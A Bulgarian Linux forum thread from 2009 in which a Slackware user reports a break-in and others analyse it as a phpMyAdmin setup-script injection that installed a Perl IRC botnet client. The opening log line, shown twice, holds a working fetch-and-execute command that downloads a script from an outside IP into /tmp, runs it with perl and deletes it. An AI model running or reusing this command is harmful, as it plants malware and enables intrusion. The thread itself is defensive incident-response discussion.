88.191.14.38 - - [29/Nov/2009:02:12:10 +0200] "GET /phpMyAdmin/config/config.inc.php?c=cd%20/tmp;wget%20http://88.170.72.136/gcc.txt;lwp-download%20http://88.170.72.136/gcc.txt;fetch%20http://88.170.72.136/gcc.txt;perl%20gcc.txt;rm%20-fr%20gcc.txt HTTP/1.1" 200 181

sickmind · « **Отговор #5 -:** Nov 29, 2009, 21:20 »

И аз имам подобен проблем, днес видях в логовете че много IPта са се опитвали да отворят различни файлове от phpmyadmin но за щастие не са успяли (грешка 404 са получили) както и други които не са от phpmyadmin. Сега съм го изтрил (не ми и трябва) но как да забраня на съмнителните IPта да получават отговор от сайта и сървъра ми?
CentOS 5.4 + firewall'a който върви със ОС'а (пуснал съм портове 80, 8080 и още един за една програмка която слуша на него но тя няма значение).
благодаря предварително

VladSun · « **Отговор #6 -:** Nov 30, 2009, 01:02 »

Цитат на: Lucifer в Nov 29, 2009, 19:50

So ... Наистина са ме хакнали ... идеята е колко точно

88.191.14.38 - - [29/Nov/2009:02:12:10 +0200] "GET /phpMyAdmin/config/config.inc.php?c=cd%20/tmp;wget%20http://88.170.72.136/gcc.txt;lwp-download%20http://88.170.72.136/gcc.txt;fetch%20http://88.170.72.136/gcc.txt;perl%20gcc.txt;rm%20-fr%20gcc.txt HTTP/1.1" 200 181

http://www.phpmyadmin.net/documentation/#setup_script

Цитат

# PoC script successfully tested on the following targets:
# phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1
# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)

# attack requirements:
# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5
# and 3.x before 3.1.3.1 according to PMASA-2009-3
# 2) it *seems* this vuln can only be exploited against environments
# where the administrator has chosen to install phpMyAdmin following
# the *wizard* method, rather than manual method: http://snipurl.com/jhjxx
# 3) administrator must have NOT deleted the '/config/' directory
# within the '/phpMyAdmin/' directory. this is because this directory is
# where '/scripts/setup.php' tries to create 'config.inc.php' which is where
# our evil PHP code is injected

sickmind · « **Отговор #7 -:** Nov 30, 2009, 09:16 »

файла който са ти качили от http://88.170.72.136/gcc.txt
НОД'а го разпознава като Perl/Shellbot.A trojan

BlackMetal · « **Отговор #8 -:** Nov 30, 2009, 10:17 »

прегледай тази малка перл програмка, но маи дава шел и е IRC сървър.

gat3way · « **Отговор #9 -:** Nov 30, 2009, 10:55 »

Това очевидно е ботнет-ски IRC клиент - връзва се към някакъв IRC сървър, влиза в някакъв канал и чака команди от botmaster-a. Клиента се маскира като httpd процес, връзва се към IRC сървъра 216.65.38.11:6667, влиза в канал #opers с ключ :123 и чака команди, подадени от ботмастър с ник Alucard, steps или gelos. Ника на първо четене май е комбинация от "PH" и PID-а на процеса, ама не гарантирам.

Та за да си го върнеш, можеш да се вържеш на IRC сървъра, да влезеш в канала, да вземеш /WHOIS информация от ботовете и да разпратиш мейлове на собствениците на хостовете че са хакнати. Можеш да видиш и кой е собственика на този ip range (на който принадлежи адреса на хакерското ircd) и да пратиш един мейл до abuse@blabla да ги информираш че някой техен потребител си е подкарал botnet и сървърът слухти на адрес от тяхната мрежа.

vector1 · « **Отговор #10 -:** Nov 30, 2009, 11:04 »

Инсталирай clamav и rkhunter сканирай и ъпдейтвай php.

Lucifer · « **Отговор #11 -:** Nov 30, 2009, 15:18 »

Оправих нещата по най-балъшкия начин -
removepkg httpd
slackpkg install httpd ... тъй като нямах време и възможност ... да го мъча от работа ... и ако не стане като се прибера в средата на месеца ще го оправям ...

Подобни теми
	Заглавие	Започната от	Отговора	Прегледи	Последна публикация
	Каква е разликата му Slackware 10 и current Настройка на програми	kkassabow	2	2150	Nov 03, 2004, 20:35 от Филип Бонев
	Проблем с KDE 3.4 на Slackware-Current Настройка на програми	ZXR12RR	28	7917	Apr 08, 2005, 16:02 от zazzko
	Проблем с инсталация на Slackware current Настройка на програми	Silky	3	2364	Mar 30, 2005, 20:24 от rpetrov
	Проблем с KDE 3.4 на Slackware-Current Настройка на програми	jmut	0	1641	Mar 30, 2005, 19:22 от jmut
	Slackware current + 2.6.11 ******* Хардуерни и софтуерни проблеми	kdpetkov	3	2615	Apr 08, 2005, 23:23 от Agent_SMITH

Автор Тема: Slackware 13 current - мисля че съм хакнат (Прочетена 2953 пъти)

Lucifer

Slackware 13 current - мисля че съм хакнат

Lucifer

Re: Slackware 13 current - мисля че съм хакнат

laskov

Re: Slackware 13 current - мисля че съм хакнат

Lucifer

Re: Slackware 13 current - мисля че съм хакнат

Lucifer

Re: Slackware 13 current - мисля че съм хакнат

sickmind

Re: Slackware 13 current - мисля че съм хакнат

VladSun

Re: Slackware 13 current - мисля че съм хакнат

sickmind

Re: Slackware 13 current - мисля че съм хакнат

BlackMetal

Re: Slackware 13 current - мисля че съм хакнат

gat3way

Re: Slackware 13 current - мисля че съм хакнат

vector1

Re: Slackware 13 current - мисля че съм хакнат

Lucifer

Re: Slackware 13 current - мисля че съм хакнат